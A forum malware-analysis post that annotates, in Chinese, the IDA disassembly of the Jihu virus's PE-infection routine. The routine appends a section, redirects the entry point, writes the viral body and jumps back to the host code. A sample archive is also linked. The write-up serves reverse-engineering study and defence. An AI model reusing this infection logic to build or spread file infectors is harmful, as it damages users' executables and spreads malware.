好友
阅读权限40
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【文章标题】: 极虎感染型病毒感染代码的详细分析
【文章作者】: fzyr520
【使用工具】: OD,IDA,PEID
【操作平台】: XP-SP2
【作者声明】: 其他部分有人分析过了,感染部分我补上,如有不对请指正。
virus.rar
(651 KB, 下载次数: 66)
解压密码:123
感染带我我标注的函数是Infect
EXPLORER[1].EXE(感染源)放出appmgmts.dll,感染功能在appmgmts.dll中
1.先判断时候有签名,如果是系统签名文件就不感染;
.text:00406B36 ; int __stdcall Infect(LPCSTR lpMultiByteStr)
.text:00406B36 Infect proc near ; CODE XREF: sub_405F38+FC�p
.text:00406B36
.text:00406B36 var_13C = dword ptr -13Ch
.text:00406B36 var_138 = dword ptr -138h
.text:00406B36 var_134 = byte ptr -134h
.text:00406B36 var_E8 = dword ptr -0E8h
.text:00406B36 Infect_Section_FileOffset= dword ptr -0E4h
.text:00406B36 var_E0 = dword ptr -0E0h
.text:00406B36 var_DC = byte ptr -0DCh
.text:00406B36 PE = dword ptr -90h
.text:00406B36 EntryPoint_source= dword ptr -8Ch
.text:00406B36 CreationTime = byte ptr -88h
.text:00406B36 var_70 = dword ptr -70h
.text:00406B36 Buffer = dword ptr -6Ch
.text:00406B36 hFile = dword ptr -68h
.text:00406B36 Dst = dword ptr -64h
.text:00406B36 var_60 = dword ptr -60h
.text:00406B36 SizeOf_InfectSource= dword ptr -5Ch
.text:00406B36 InfectSection_VirtualAddress= dword ptr -58h
.text:00406B36 SizeOf_InfectSource_FileOffSet= dword ptr -54h
.text:00406B36 var_50 = dword ptr -50h
.text:00406B36 var_42 = word ptr -42h
.text:00406B36 var_40 = dword ptr -40h
.text:00406B36 var_3C = dword ptr -3Ch
.text:00406B36 current_section = dword ptr -38h
.text:00406B36 NumberOfBytesWritten= dword ptr -34h
.text:00406B36 hObject = dword ptr -30h
.text:00406B36 var_2C = dword ptr -2Ch
.text:00406B36 lpBaseAddress = dword ptr -28h
.text:00406B36 var_24 = dword ptr -24h
.text:00406B36 var_20 = dword ptr -20h
.text:00406B36 raw_size = dword ptr -1Ch
.text:00406B36 var_18 = dword ptr -18h
.text:00406B36 var_10 = dword ptr -10h
.text:00406B36 var_4 = dword ptr -4
.text:00406B36 lpMultiByteStr = dword ptr 8
.text:00406B36 arg_20 = dword ptr 28h
.text:00406B36 arg_34 = dword ptr 3Ch
.text:00406B36
.text:00406B36 push ebp
.text:00406B37 mov ebp, esp
.text:00406B39 push 0FFFFFFFFh
.text:00406B3B push offset unk_409F00
.text:00406B40 push offset loc_4089A0
.text:00406B45 mov eax, large fs:0
.text:00406B4B push eax
.text:00406B4C mov large fs:0, esp
.text:00406B53 push ecx
.text:00406B54 push ecx
.text:00406B55 sub esp, 124h
.text:00406B5B push ebx
.text:00406B5C push esi
.text:00406B5D push edi
.text:00406B5E mov [ebp+var_18], esp
.text:00406B61 and [ebp+current_section], 0
.text:00406B65 and [ebp+var_2C], 0
.text:00406B69 and [ebp+lpBaseAddress], 0
.text:00406B6D and [ebp+var_70], 0
.text:00406B71 and [ebp+var_24], 0
.text:00406B75 and [ebp+var_3C], 0
.text:00406B79 and [ebp+NumberOfBytesWritten], 0
.text:00406B7D and [ebp+raw_size], 0
.text:00406B81 and [ebp+EntryPoint_source], 0
.text:00406B88 and [ebp+Buffer], 0
.text:00406B8C or [ebp+hFile], 0FFFFFFFFh
.text:00406B90 and [ebp+hObject], 0
.text:00406B94 and [ebp+PE], 0
.text:00406B9B and [ebp+var_20], 0
.text:00406B9F and [ebp+var_4], 0
.text:00406BA3 push [ebp+lpMultiByteStr] ; lpMultiByteStr
.text:00406BA6 call JudgmentWinVerifyTrust
.text:00406BAB cmp eax, 1 ;
.text:00406BAB ; 签名判断,不感染系统签名文件
.text:00406BAB ;
.text:00406BAE jnz short loc_406BB5
.text:00406BB0 jmp loc_4071A4
2.文件映射
.text:00406BDE ; ---------------------------------------------------------------------------
.text:00406BDE
.text:00406BDE loc_406BDE: ; CODE XREF: Infect+A1�j
.text:00406BDE push 0 ; int
.text:00406BE0 lea eax, [ebp+CreationTime]
.text:00406BE6 push eax ; lpCreationTime
.text:00406BE7 push [ebp+hFile] ; hFile
.text:00406BEA call __GetFileTime
.text:00406BEF push FILE_END ; dwMoveMethod
.text:00406BF1 push 0 ; lpDistanceToMoveHigh
.text:00406BF3 push 0 ; lDistanceToMove
.text:00406BF5 push [ebp+hFile] ; hFile
.text:00406BF8 call ds:SetFilePointer
.text:00406BFE mov [ebp+var_24], eax
.text:00406C01 push 0 ; lpName
.text:00406C03 push 0 ; dwMaximumSizeLow
.text:00406C05 push 0 ; dwMaximumSizeHigh
.text:00406C07 push PAGE_READWRITE ; flProtect
.text:00406C09 push 0 ; lpFileMappingAttributes
.text:00406C0B push [ebp+hFile] ; hFile
.text:00406C0E call ds:CreateFileMappingA
.text:00406C14 mov [ebp+hObject], eax
.text:00406C17 cmp [ebp+hObject], 0 ;
.text:00406C17 ; 比较创建文件映射是否成功
.text:00406C17 ;
.text:00406C1B jnz short loc_406C22
.text:00406C1D jmp loc_4071A4
.text:00406C22 ; ---------------------------------------------------------------------------
.text:00406C22
.text:00406C22 loc_406C22: ; CODE XREF: Infect+E5�j
.text:00406C22 push 400h ; dwNumberOfBytesToMap
.text:00406C27 push 0 ; dwFileOffsetLow
.text:00406C29 push 0 ; dwFileOffsetHigh
.text:00406C2B push FILE_MAP_ALL_ACCESS ; dwDesiredAccess
.text:00406C30 push [ebp+hObject] ; hFileMappingObject
.text:00406C33 call ds:MapViewOfFile
.text:00406C39 mov [ebp+lpBaseAddress], eax
.text:00406C3C cmp [ebp+lpBaseAddress], 0
.text:00406C40 jz short loc_406C4F
.text:00406C42 mov eax, [ebp+lpBaseAddress]
.text:00406C45 movzx eax, word ptr [eax]
.text:00406C48 cmp eax, 5A4Dh ;
.text:00406C48 ; 比较是否为MZ
.text:00406C48 ;
.text:00406C4D jz short loc_406C54
.text:00406C4F
.text:00406C4F loc_406C4F: ; CODE XREF: Infect+10A�j
.text:00406C4F jmp loc_4071A4
.text:00406C54 ; ---------------------------------------------------------------------------
.text:00406C54
.text:00406C54 loc_406C54: ; CODE XREF: Infect+117�j
.text:00406C54 mov eax, [ebp+lpBaseAddress]
.text:00406C57 mov ecx, [ebp+lpBaseAddress]
.text:00406C5A add ecx, [eax+IMAGE_DOS_HEADER.e_lfanew]
.text:00406C5D mov [ebp+PE], ecx
.text:00406C63 mov eax, [ebp+lpBaseAddress]
.text:00406C66 add eax, [ebp+var_24]
.text:00406C69 cmp [ebp+PE], eax
.text:00406C6F jnb short loc_406C8C
.text:00406C71 mov eax, [ebp+PE]
.text:00406C77 cmp eax, [ebp+lpBaseAddress]
.text:00406C7A jbe short loc_406C8C
.text:00406C7C mov eax, [ebp+PE]
.text:00406C82 movzx eax, word ptr [eax]
.text:00406C85 cmp eax, 4550h ;
.text:00406C85 ; 比较是否是PE
.text:00406C8A jz short loc_406C91
.text:00406C8C
.text:00406C8C loc_406C8C: ; CODE XREF: Infect+139�j
.text:00406C8C ; Infect+144�j
.text:00406C8C jmp loc_4071A4
.text:00406C91 ; ---------------------------------------------------------------------------
.text:00406C91
.text:00406C91 loc_406C91: ; CODE XREF: Infect+154�j
.text:00406C91 mov eax, [ebp+PE]
.text:00406C97 movzx eax, word ptr [eax+6] ; 节数目
.text:00406C9B dec eax
.text:00406C9C imul eax, 28h
.text:00406C9F mov ecx, [ebp-90h] ;
.text:00406C9F ; ebp-90 导出表
.text:00406C9F ;
.text:00406CA5 lea eax, [ecx+eax+0F8h]
.text:00406CAC mov [ebp+var_20], eax ;
.text:00406CAC ; 最后一个节的节名放入ebp+var_20
.text:00406CAC ;
.text:00406CAF mov eax, [ebp+var_20]
.text:00406CB2 movzx eax, word ptr [eax+22h] ; NumberOfLinenumbers
.text:00406CB6 movzx ecx, word_40BE64 ; 和 D9比
.text:00406CB6 ;
.text:00406CBD cmp eax, ecx
.text:00406CBF jl short loc_406CC6
.text:00406CC1 jmp loc_4071A4
.text:00406CC6 ; ---------------------------------------------------------------------------
.text:00406CC6
.text:00406CC6 loc_406CC6: ; CODE XREF: Infect+189�j
.text:00406CC6 mov eax, [ebp+var_20]
.text:00406CC9 movzx eax, word ptr [eax+22h]
.text:00406CCD test eax, eax
.text:00406CCF jz loc_406D5C ;
.text:00406CCF ; 此处跳走
.text:00406CCF ;
3.具体感染过程
.text:00406D5C ; Infect+1AF�j
.text:00406D5C mov eax, [ebp+PE]
.text:00406D62 movzx eax, word ptr [eax+6]
.text:00406D66 imul eax, 28h
.text:00406D69 add eax, 0F8h ; 到节表的最后一个节后面,后面紧接着判断是否为0,
.text:00406D69 ; 28H大小
.text:00406D6E mov [ebp+var_3C], eax
.text:00406D71 mov eax, [ebp+PE]
.text:00406D77 add eax, [ebp+var_3C]
.text:00406D7A mov [ebp+var_70], eax ; ebp+var_70 最后一个节结束的内存内存地址
.text:00406D7D cmp [ebp+var_2C], 0 ;
.text:00406D7D ; ebp+var_2C = 00000000 判断最后一个接后面的起始位置是否
.text:00406D7D ; 是0
.text:00406D7D ;
.text:00406D81 jnz short loc_406DB7
.text:00406D83 and [ebp+current_section], 0
.text:00406D87 jmp short loc_406D90 ;
.text:00406D87 ; 循环加4,直到大小为4*A 大小,就是一个节的大小28
.text:00406D87 ;
.text:00406D89 ; ---------------------------------------------------------------------------
.text:00406D89
.text:00406D89 loc_406D89: ; CODE XREF: Infect+274�j
.text:00406D89 mov eax, [ebp+current_section]
.text:00406D8C inc eax
.text:00406D8D mov [ebp+current_section], eax
.text:00406D90
.text:00406D90 loc_406D90: ; CODE XREF: Infect+251�j
.text:00406D90 cmp [ebp+current_section], 0Ah ;
.text:00406D90 ; 循环加4,直到大小为4*A 大小,就是一个节的大小28
.text:00406D90 ;
.text:00406D94 jge short loc_406DAC
.text:00406D96 mov eax, [ebp+var_70]
.text:00406D99 mov ecx, [ebp+raw_size]
.text:00406D9C add ecx, [eax]
.text:00406D9E mov [ebp+raw_size], ecx
.text:00406DA1 mov eax, [ebp+var_70]
.text:00406DA4 add eax, 4
.text:00406DA7 mov [ebp+var_70], eax
.text:00406DAA jmp short loc_406D89
.text:00406DAC ; ---------------------------------------------------------------------------
.text:00406DAC
.text:00406DAC loc_406DAC: ; CODE XREF: Infect+25E�j
.text:00406DAC cmp [ebp+raw_size], 0
.text:00406DB0 jz short loc_406DB7
.text:00406DB2 jmp loc_4071A4
.text:00406DB7 ; ---------------------------------------------------------------------------
.text:00406DB7
.text:00406DB7 loc_406DB7: ; CODE XREF: Infect+24B�j
.text:00406DB7 ; Infect+27A�j
.text:00406DB7 mov eax, [ebp+PE]
.text:00406DBD mov eax, [eax+IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint]
.text:00406DC0 mov [ebp+EntryPoint_source], eax ;
.text:00406DC0 ; 存放原始入口点
.text:00406DC0 ;
.text:00406DC6 mov eax, [ebp+PE]
.text:00406DCC movzx eax, word ptr [eax+6]
.text:00406DD0 dec eax
.text:00406DD1 imul eax, 28h
.text:00406DD4 mov ecx, [ebp+PE]
.text:00406DDA lea eax, [ecx+eax+0F8h]
.text:00406DE1 mov [ebp+var_20], eax
.text:00406DE4 push 28h ; Size
.text:00406DE6 push 0 ; Val
.text:00406DE8 lea eax, [ebp+Dst]
.text:00406DEB push eax ; Dst
.text:00406DEC call memset
.text:00406DF1 add esp, 0Ch
.text:00406DF4 mov [ebp+Dst], 'ct.' ; 节名
.text:00406DFB mov eax, [ebp+EntryPoint_source]
.text:00406E01 mov [ebp+var_60], eax
.text:00406E04 mov eax, [ebp+PE]
.text:00406E0A push [eax+IMAGE_NT_HEADERS.OptionalHeader.SectionAlignment] ; 节对齐大小
.text:00406E0D mov eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E12 add eax, 1FBh
.text:00406E17 push eax
.text:00406E18 call CalculateSection ;
.text:00406E18 ; 按节对齐的方式计算添加的感染节.tc 的virtual size
.text:00406E18 ;fun(infect_source_size+infect_section_size,SectionAlignment)
.text:00406E18 ;
.text:00406E1D mov [ebp+SizeOf_InfectSource], eax ; 3e000
.text:00406E20 mov eax, [ebp+PE]
.text:00406E26 push [eax+IMAGE_NT_HEADERS.OptionalHeader.SectionAlignment]
.text:00406E29 mov eax, [ebp+var_20]
.text:00406E2C push [eax+IMAGE_SECTION_HEADER.Misc.PhysicalAddress]
.text:00406E2F call CalculateSection ;
.text:00406E2F ; 按节对齐的方式计算正常文件最后一个节的virtual_size
.text:00406E2F ;
.text:00406E34 mov ecx, [ebp+var_20] ;
.text:00406E34 ;
.text:00406E37 add eax, [ecx+IMAGE_SECTION_HEADER.VirtualAddress] ;
.text:00406E37 ; 计算得到感染节的VirtualAddress
.text:00406E37 ;
.text:00406E3A mov [ebp+InfectSection_VirtualAddress], eax
.text:00406E3D mov eax, [ebp+PE]
.text:00406E43 push [eax+IMAGE_NT_HEADERS.OptionalHeader.FileAlignment] ; 文件对齐大小
.text:00406E46 mov eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E4B add eax, 1FBh
.text:00406E50 push eax
.text:00406E51 call CalculateSection ;
.text:00406E51 ; 按文件对齐的方式计算添加的感染节.tc 的
.text:00406E51 ; raw size大小
.text:00406E51 ;fun(infect_source_size+infect_section_size,FileAlignment)
.text:00406E56 mov [ebp+SizeOf_InfectSource_FileOffSet], eax
.text:00406E59 and [ebp+var_138], 0
.text:00406E60 push 4Ch ; Size
.text:00406E62 push 0 ; Val
.text:00406E64 lea eax, [ebp+var_134]
.text:00406E6A push eax ; Dst
.text:00406E6B call memset
.text:00406E70 add esp, 0Ch
.text:00406E73 and [ebp+var_E0], 0
.text:00406E7A push 4Ch ; Size
.text:00406E7C push 0 ; Val
.text:00406E7E lea eax, [ebp+var_DC]
.text:00406E84 push eax ; Dst
.text:00406E85 call memset
.text:00406E8A add esp, 0Ch
.text:00406E8D and [ebp+var_2C], 0
.text:00406E91 mov [ebp+current_section], 1
.text:00406E98 jmp short loc_406EA1
.text:00406E9A ; ---------------------------------------------------------------------------
.text:00406E9A
.text:00406E9A loc_406E9A: ; CODE XREF: Infect:loc_406F0C�j
.text:00406E9A mov eax, [ebp+current_section]
.text:00406E9D inc eax ;
.text:00406E9D ; 节数加1
.text:00406E9D ;
.text:00406E9E mov [ebp+current_section], eax
.text:00406EA1
.text:00406EA1 loc_406EA1: ; CODE XREF: Infect+362�j
.text:00406EA1 mov eax, [ebp+PE]
.text:00406EA7 movzx eax, [eax+IMAGE_NT_HEADERS.FileHeader.NumberOfSections]
.text:00406EAB cmp [ebp+current_section], eax ;
.text:00406EAB ; 比较节 从第一个节开始
.text:00406EAB ;
.text:00406EAE jg short loc_406F0E
.text:00406EB0 mov eax, [ebp+PE]
.text:00406EB6 movzx eax, [eax+IMAGE_NT_HEADERS.FileHeader.NumberOfSections]
.text:00406EBA sub eax, [ebp+current_section]
.text:00406EBD imul eax, 28h
.text:00406EC0 mov ecx, [ebp+PE]
.text:00406EC6 lea eax, [ecx+eax+0F8h]
.text:00406ECD mov [ebp+var_20], eax
.text:00406ED0 mov eax, [ebp+var_20]
.text:00406ED3 cmp [eax+IMAGE_SECTION_HEADER.SizeOfRawData], 0 ; 比较节大小是否为0
.text:00406ED7 jz short loc_406F0C
.text:00406ED9 mov eax, [ebp+var_20]
.text:00406EDC mov eax, [eax+IMAGE_SECTION_HEADER.PointerToRawData] ; 节文件偏移
.text:00406EDF mov ecx, [ebp+var_20]
.text:00406EE2 add eax, [ecx+IMAGE_SECTION_HEADER.SizeOfRawData] ;
.text:00406EE2 ; 节偏移+节大小 = 计算添加感染节的raw offset
.text:00406EE2 ; 由于在循环体中,这里计算是每个节的节偏移加节大小
.text:00406EE5 mov [ebp+raw_size], eax
.text:00406EE8 mov eax, [ebp+var_24] ; 上面计算了 节偏移+节大小
.text:00406EE8 ; 这里 ebp+var_24 是下一个节的raw offset
.text:00406EE8 ;
.text:00406EEB sub eax, [ebp+raw_size] ; 计算 current_section raw size
.text:00406EEE mov ecx, [ebp+var_2C] ; ebp+var_2C 从0开始
.text:00406EF1 mov [ebp+ecx*4+var_138], eax ; 把算出来的值存入var_138
.text:00406EF8 mov eax, [ebp+var_2C]
.text:00406EFB mov ecx, [ebp+current_section]
.text:00406EFE mov [ebp+eax*4+var_E0], ecx
.text:00406F05 mov eax, [ebp+var_2C]
.text:00406F08 inc eax ;
.text:00406F08 ; 从第一个节开始循环加一
.text:00406F08 ;
.text:00406F09 mov [ebp+var_2C], eax
.text:00406F0C
.text:00406F0C loc_406F0C: ; CODE XREF: Infect+3A1�j
.text:00406F0C jmp short loc_406E9A
.text:00406F0E ; ---------------------------------------------------------------------------
.text:00406F0E
.text:00406F0E loc_406F0E: ; CODE XREF: Infect+378�j
.text:00406F0E and [ebp+var_13C], 0
.text:00406F15 mov eax, [ebp+var_138]
.text:00406F1B mov [ebp+raw_size], eax
.text:00406F1E and [ebp+current_section], 0
.text:00406F22 jmp short loc_406F2B
.text:00406F24 ; ---------------------------------------------------------------------------
.text:00406F24
.text:00406F24 loc_406F24: ; CODE XREF: Infect:loc_406F4F�j
.text:00406F24 mov eax, [ebp+current_section]
.text:00406F27 inc eax ; 节循环加1
.text:00406F28 mov [ebp+current_section], eax
.text:00406F2B
.text:00406F2B loc_406F2B: ; CODE XREF: Infect+3EC�j
.text:00406F2B mov eax, [ebp+current_section]
.text:00406F2E cmp eax, [ebp+var_2C]
.text:00406F31 jge short loc_406F51
.text:00406F33 mov eax, [ebp+current_section]
.text:00406F36 mov ecx, [ebp+raw_size]
.text:00406F39 cmp ecx, [ebp+eax*4+var_138] ; 比较每个节的raw_size是否为0
.text:00406F40 jbe short loc_406F4F
.text:00406F42 mov eax, [ebp+current_section]
.text:00406F45 mov eax, [ebp+eax*4+var_138]
.text:00406F4C mov [ebp+raw_size], eax
.text:00406F4F
.text:00406F4F loc_406F4F: ; CODE XREF: Infect+40A�j
.text:00406F4F jmp short loc_406F24
.text:00406F51 ; ---------------------------------------------------------------------------
.text:00406F51
.text:00406F51 loc_406F51: ; CODE XREF: Infect+3FB�j
.text:00406F51 and [ebp+current_section], 0
.text:00406F55 jmp short loc_406F5E
.text:00406F57 ; ---------------------------------------------------------------------------
.text:00406F57
.text:00406F57 loc_406F57: ; CODE XREF: Infect:loc_406F87�j
.text:00406F57 mov eax, [ebp+current_section]
.text:00406F5A inc eax
.text:00406F5B mov [ebp+current_section], eax
.text:00406F5E
.text:00406F5E loc_406F5E: ; CODE XREF: Infect+41F�j
.text:00406F5E mov eax, [ebp+current_section]
.text:00406F61 cmp eax, [ebp+var_2C]
.text:00406F64 jge short loc_406F89
.text:00406F66 mov eax, [ebp+current_section]
.text:00406F69 mov ecx, [ebp+raw_size]
.text:00406F6C cmp ecx, [ebp+eax*4+var_138]
.text:00406F73 jnz short loc_406F87
.text:00406F75 mov eax, [ebp+current_section]
.text:00406F78 mov eax, [ebp+eax*4+var_E0]
.text:00406F7F mov [ebp+var_13C], eax
.text:00406F85 jmp short loc_406F89
.text:00406F87 ; ---------------------------------------------------------------------------
.text:00406F87
.text:00406F87 loc_406F87: ; CODE XREF: Infect+43D�j
.text:00406F87 jmp short loc_406F57
.text:00406F89 ; ---------------------------------------------------------------------------
.text:00406F89
.text:00406F89 loc_406F89: ; CODE XREF: Infect+42E�j
.text:00406F89 ; Infect+44F�j
.text:00406F89 cmp [ebp+var_13C], 0
.text:00406F90 jnz short loc_406F9C
.text:00406F92 mov [ebp+var_13C], 1
.text:00406F9C
.text:00406F9C loc_406F9C: ; CODE XREF: Infect+45A�j
.text:00406F9C mov eax, [ebp+PE]
.text:00406FA2 movzx eax, [eax+IMAGE_NT_HEADERS.FileHeader.NumberOfSections]
.text:00406FA6 sub eax, [ebp+var_13C]
.text:00406FAC imul eax, 28h
.text:00406FAF mov ecx, [ebp+PE]
.text:00406FB5 lea eax, [ecx+eax+0F8h]
.text:00406FBC mov [ebp+var_20], eax
.text:00406FBF mov eax, [ebp+PE]
.text:00406FC5 push [eax+IMAGE_NT_HEADERS.OptionalHeader.FileAlignment]
.text:00406FC8 mov eax, [ebp+var_20]
.text:00406FCB push [eax+IMAGE_SECTION_HEADER.SizeOfRawData]
.text:00406FCE call CalculateSection ; 按文件对齐的方式计算正常文件最后一个节的大小
.text:00406FD3 mov [ebp+raw_size], eax
.text:00406FD6 mov eax, [ebp+var_20]
.text:00406FD9 mov ecx, [ebp+raw_size]
.text:00406FDC add ecx, [eax+IMAGE_SECTION_HEADER.PointerToRawData] ; 计算感染节的raw_offset
.text:00406FDF mov [ebp+Infect_Section_FileOffset], ecx
.text:00406FE5 mov eax, [ebp+var_24]
.text:00406FE8 sub eax, [ebp+Infect_Section_FileOffset]
.text:00406FEE mov [ebp+var_E8], eax
.text:00406FF4 cmp [ebp+raw_size], 0 ;
.text:00406FF4 ; 比较节大小是否为0
.text:00406FF4 ;
.text:00406FF8 jz short loc_40700A
.text:00406FFA xor eax, eax
.text:00406FFC sub eax, [ebp+var_E8]
.text:00407002 mov [ebp+var_E8], eax
.text:00407008 jmp short loc_407019
.text:0040700A ; ---------------------------------------------------------------------------
.text:0040700A
.text:0040700A loc_40700A: ; CODE XREF: Infect+4C2�j
.text:0040700A mov eax, [ebp+Infect_Section_FileOffset]
.text:00407010 sub eax, [ebp+var_24]
.text:00407013 mov [ebp+var_E8], eax
.text:00407019
.text:00407019 loc_407019: ; CODE XREF: Infect+4D2�j
.text:00407019 mov eax, [ebp+Infect_Section_FileOffset]
.text:0040701F mov [ebp+var_50], eax
.text:00407022 mov [ebp+var_40], 0E0000020h
.text:00407029 mov ax, word_40BE64 ; word_40BE64 = d9
.text:0040702F mov [ebp+var_42], ax
.text:00407033 push 28h ; Size
.text:00407035 lea eax, [ebp+Dst]
.text:00407038 push eax ; Src
.text:00407039 mov eax, [ebp+PE]
.text:0040703F add eax, [ebp+var_3C]
.text:00407042 push eax ; Dst
.text:00407043 call memcpy
.text:00407048 add esp, 0Ch
.text:0040704B mov eax, [ebp+PE]
.text:00407051 movzx eax, [eax+IMAGE_NT_HEADERS.FileHeader.NumberOfSections]
.text:00407055 inc eax ;
.text:00407055 ; 节数加1
.text:00407055 ;
.text:00407056 mov ecx, [ebp+PE]
.text:0040705C mov [ecx+IMAGE_NT_HEADERS.FileHeader.NumberOfSections], ax ;
.text:0040705C ; 修改PE节的数目为感染后节数目
.text:0040705C ;
.text:00407060 mov eax, [ebp+PE]
.text:00407066 cmp [eax+IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode], 0 ; 比较sizeofcode是否为0
.text:0040706A jz short loc_407081
.text:0040706C mov eax, [ebp+PE]
.text:00407072 mov eax, [eax+IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode]
.text:00407075 add eax, [ebp+SizeOf_InfectSource] ; 计算感染后的SizeOfCode
.text:00407078 mov ecx, [ebp+PE]
.text:0040707E mov [ecx+IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode], eax ; 用感染后的sizeofcode替换掉原始值
.text:0040707E ;
.text:00407081
.text:00407081 loc_407081: ; CODE XREF: Infect+534�j
.text:00407081 mov eax, [ebp+PE]
.text:00407087 mov ecx, [ebp+InfectSection_VirtualAddress] ; InfectSection_VirtualAddress其实就是感染后的入口点
.text:0040708A mov [eax+IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint], ecx
.text:0040708D mov eax, [ebp+PE]
.text:00407093 mov eax, [eax+IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage]
.text:00407096 add eax, [ebp+SizeOf_InfectSource] ; 计算得到感染后的SizeOfImage
.text:00407099 mov ecx, [ebp+PE]
.text:0040709F mov [ecx+IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage], eax ; 用感染后的sizeofimage替换掉原始值
.text:004070A2 push [ebp+lpBaseAddress] ; lpBaseAddress
.text:004070A5 call ds:UnmapViewOfFile
.text:004070AB push [ebp+hObject] ; hObject
.text:004070AE call ds:CloseHandle
.text:004070B4 and [ebp+lpBaseAddress], 0
.text:004070B8 and [ebp+hObject], 0
.text:004070BC push FILE_END ; dwMoveMethod
.text:004070BE push 0 ; lpDistanceToMoveHigh
.text:004070C0 mov eax, [ebp+var_E8]
.text:004070C6 add eax, [ebp+SizeOf_InfectSource_FileOffSet]
.text:004070C9 push eax ; lDistanceToMove
.text:004070CA push [ebp+hFile] ; hFile
.text:004070CD call ds:SetFilePointer
.text:004070D3 push [ebp+hFile] ; hFile
.text:004070D6 call ds:SetEndOfFile ;
.text:004070D6 ; 把文件指针移到文件尾增加节的长度3E000
.text:004070D6 ;
.text:004070DC push FILE_END ; dwMoveMethod
.text:004070DE push 0 ; lpDistanceToMoveHigh
.text:004070E0 xor eax, eax
.text:004070E2 sub eax, [ebp+SizeOf_InfectSource_FileOffSet]
.text:004070E5 push eax ; lDistanceToMove
.text:004070E6 push [ebp+hFile] ; hFile
.text:004070E9 call ds:SetFilePointer ;
.text:004070E9 ; 把指针移到原始文件尾
.text:004070E9 ;
.text:004070EF push 0 ; lpOverlapped
.text:004070F1 lea eax, [ebp+NumberOfBytesWritten]
.text:004070F4 push eax ; lpNumberOfBytesWritten
.text:004070F5 push 1FBh ; nNumberOfBytesToWrite
.text:004070FA push offset loc_409B78 ;
.text:004070FA ; loc_409B78 为感染节的代码 大小为1FB
.text:004070FA ;
.text:004070FF push [ebp+hFile] ; hFile
.text:00407102 call ds:WriteFile ;
.text:00407102 ; 向增加的节写入感染代码
.text:00407102 ;
.text:00407108 push 0 ; lpOverlapped
.text:0040710A lea eax, [ebp+NumberOfBytesWritten]
.text:0040710D push eax ; lpNumberOfBytesWritten
.text:0040710E push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00407114 push lpBuffer ; lpBuffer
.text:0040711A push [ebp+hFile] ; hFile
.text:0040711D call ds:WriteFile ;
.text:0040711D ; 从1FB处写整个感染源
.text:0040711D ;
.text:00407123 push FILE_CURRENT ; dwMoveMethod
.text:00407125 push 0 ; lpDistanceToMoveHigh
.text:00407127 xor eax, eax
.text:00407129 sub eax, nNumberOfBytesToWrite
.text:0040712F push eax ; lDistanceToMove
.text:00407130 push [ebp+hFile] ; hFile
.text:00407133 call ds:SetFilePointer ;
.text:00407133 ; 移到感染代码1FB处
.text:00407133 ;
.text:00407139 push 0 ; lpOverlapped
.text:0040713B lea eax, [ebp+NumberOfBytesWritten]
.text:0040713E push eax ; lpNumberOfBytesWritten
.text:0040713F push 4 ; nNumberOfBytesToWrite
.text:00407141 push offset nNumberOfBytesToWrite ; lpBuffer
.text:00407146 push [ebp+hFile] ; hFile
.text:00407149 call ds:WriteFile ;
.text:00407149 ; 写入感染源大小3e600,这里会导致前面刚写入的感染源
.text:00407149 ; (exe文件)的头4个byte被这个大小覆盖掉
.text:00407149 ;
.text:0040714F mov eax, [ebp+InfectSection_VirtualAddress]
.text:00407152 add eax, 193h
.text:00407157 mov ecx, [ebp+EntryPoint_source]
.text:0040715D sub ecx, eax ;
.text:0040715D ; 计算跳回正常程序的入口点地址,感染代码这个值没有,
.text:0040715D ; 是在这里计算后写入的
.text:0040715D ;
.text:0040715D ;
.text:0040715F mov [ebp+Buffer], ecx
.text:00407162 push FILE_CURRENT ; dwMoveMethod
.text:00407164 push 0 ; lpDistanceToMoveHigh
.text:00407166 push 0FFFFFF90h ; lDistanceToMove
.text:00407168 push [ebp+hFile] ; hFile
.text:0040716B call ds:SetFilePointer
.text:00407171 push 0 ; lpOverlapped
.text:00407173 lea eax, [ebp+NumberOfBytesWritten]
.text:00407176 push eax ; lpNumberOfBytesWritten
.text:00407177 push 4 ; nNumberOfBytesToWrite
.text:00407179 lea eax, [ebp+Buffer]
.text:0040717C push eax ; lpBuffer
.text:0040717D push [ebp+hFile] ; hFile
.text:00407180 call ds:WriteFile ;
.text:00407180 ; 写入原始程序入口点地址,也就是jmp跳回正常程序
.text:00407180 ;
.text:00407186 push 1 ; int
.text:00407188 lea eax, [ebp+CreationTime]
.text:0040718E push eax ; lpCreationTime
.text:0040718F push [ebp+hFile] ; hFile
.text:00407192 call __GetFileTime
.text:00407197 push [ebp+hFile] ; hObject
.text:0040719A call ds:CloseHandle
.text:004071A0 or [ebp+hFile], 0FFFFFFFFh
.text:004071A4
.text:004071A4 loc_4071A4: ; CODE XREF: Infect+7A�j
.text:004071A4 ; Infect+A3�j ...
.text:004071A4 cmp [ebp+lpBaseAddress], 0
.text:004071A8 jz short loc_4071B3
.text:004071AA push [ebp+lpBaseAddress] ; lpBaseAddress
.text:004071AD call ds:UnmapViewOfFile
.text:004071B3
.text:004071B3 loc_4071B3: ; CODE XREF: Infect+672�j
.text:004071B3 cmp [ebp+hObject], 0
.text:004071B7 jz short loc_4071C2
.text:004071B9 push [ebp+hObject] ; hObject
.text:004071BC call ds:CloseHandle
.text:004071C2
.text:004071C2 loc_4071C2: ; CODE XREF: Infect+681�j
.text:004071C2 cmp [ebp+hFile], 0FFFFFFFFh
.text:004071C6 jz short loc_4071D1
.text:004071C8 push [ebp+hFile] ; hObject
.text:004071CB call ds:CloseHandle
.text:004071D1
.text:004071D1 loc_4071D1: ; CODE XREF: Infect+690�j
.text:004071D1 or [ebp+var_4], 0FFFFFFFFh
.text:004071D5 jmp short loc_40720F
.text:004071D7 ; ---------------------------------------------------------------------------
.text:004071D7
